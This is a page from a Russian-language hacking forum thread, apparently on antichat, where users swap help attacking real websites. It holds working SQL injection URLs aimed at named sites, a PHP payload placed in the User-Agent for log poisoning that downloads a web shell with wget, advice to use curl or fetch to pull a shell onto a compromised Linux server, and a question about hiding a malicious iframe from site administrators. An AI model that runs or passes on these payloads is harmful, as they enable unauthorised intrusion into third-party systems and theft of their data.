Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    есть возможность инклюдить файл с логами. как туда записать свой код ? InetCrack`ом ?
     
  2. -=Razor=-

    -=Razor=- Member

    Joined:
    20 Dec 2008
    Messages:
    30
    Likes Received:
    29
    Reputations:
    3
    Harvard, читай, все идеально расписано http://forum.antichat.ru/thread43966.html

    daniel_1024, да ,попробуй замени : "User-Agent", своим шеллом. Для заливки полноценного шелла, отправь такой запрос
    PHP:
    <?php system('wget http://site.ru/shell.php'); ?>
     
    #11922 -=Razor=-, 21 Mar 2010
    Last edited: 21 Mar 2010
  3. psQs

    psQs New Member

    Joined:
    6 Mar 2010
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    http://www.znania.ru/dbxhigh.asp?id=1'
    как узнать версию?
    http://www.znania.ru/dbxhigh.asp?id=1+or+1=version@@-- не работает. там фильтрация какая то или что?
     
  4. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    во первых:
    http://www.znania.ru/dbxhigh.asp?id=1+or+1=@@version
    а во вторых
    http://www.znania.ru/dbxhigh.asp?id=1+and+ascii(substring(@@version),1,1)=53
     
  5. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    После установки айфрейма и загрузки страницы с ним, браузер будет писать что-то вроде Sending request to iframelink.com. Внимательный админ это сразу заметит.
    Есть способы скрытия обращения к странице, указанной в айфрейме?
     
  6. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    вот тут ты и не прав!!! сбор данных знаеш что такое, ну вот!
     
  7. psQs

    psQs New Member

    Joined:
    6 Mar 2010
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    не работает почему то
     
  8. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    Code:
    http://www.znania.ru/dbxhigh.asp?id=1+AND+ascii%28substring%28%28select+table_name+from+information_schema.tables%29,1,1%29%29%3E117
    хмм.. Could not find file 'c:\windows\system32\inetsrv\information_schema.mdb'.
     
  9. psQs

    psQs New Member

    Joined:
    6 Mar 2010
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    скажите, а где вы это все видите? у меня только вот это выводит:
     
  10. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    ты пустые поля убрал ?!?
    типа SELECT +TABLE_NAME
    з.ы select+....
     
  11. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Какие ascii(substring ?! И причём тут information_schema ? Это Microsoft Access если что.
     
    2 people like this.
  12. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10

    поjaлуста , что мойно зделать ?
     
  13. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.ceylinco-insurance.com/products.php?id=(select*from(select+name_const(version(),1),name_const(version(),1))a)
    
     
    3 people like this.
  14. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    Pashkela :

    Спасибо , а как дальше ?

    Или есть статя об етом методе ?
     
  15. -=Razor=-

    -=Razor=- Member

    Joined:
    20 Dec 2008
    Messages:
    30
    Likes Received:
    29
    Reputations:
    3
    LokbatanLi,юзай поиск... Читай : http://forum.antichat.ru/thread43966.html https://forum.antichat.ru/thread104591.html
     
    #11935 -=Razor=-, 22 Mar 2010
    Last edited: 22 Mar 2010
  16. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Pashkela
    Каким способом ты раскрутил эту инъекцию? Как это делать без подбора полей и т.д.? Мб есть линк на статью?

    В этой скуле если искать количество полей через group by, то это 12, а если union select, то при вводе 12 появляется ошибка. Почему?
     
    1 person likes this.
  17. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    ось линукс, имеется возможность выполнять системные команды. как закачать полноценный шелл? get и wget не работают...
     
  18. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    curl, fetch
     
  19. scorpic393

    scorpic393 Banned

    Joined:
    5 Feb 2010
    Messages:
    59
    Likes Received:
    4
    Reputations:
    3
    тренируюсь с блинд скулями в собсвенном скрипте.
    1. нет нормальных статей по блинду
    2. есть табла user с полем login и password

    вот пример инжекта моего

    http://localhost/index.php?id=1&act=news' and substring(version(),1,1)29=5+--+

    помогите плиз состваить запроc на проверку 1-ого симвала логина или пасса. и дайти плиз ссылки на хорошие статьи
     
  20. Life7

    Life7 Banned

    Joined:
    14 Jun 2009
    Messages:
    150
    Likes Received:
    54
    Reputations:
    0
    http://extensis.cnrc.navy.mil/index.htm?content=http://google.com

    Помогите довести до ума
     
Thread Status:
Not open for further replies.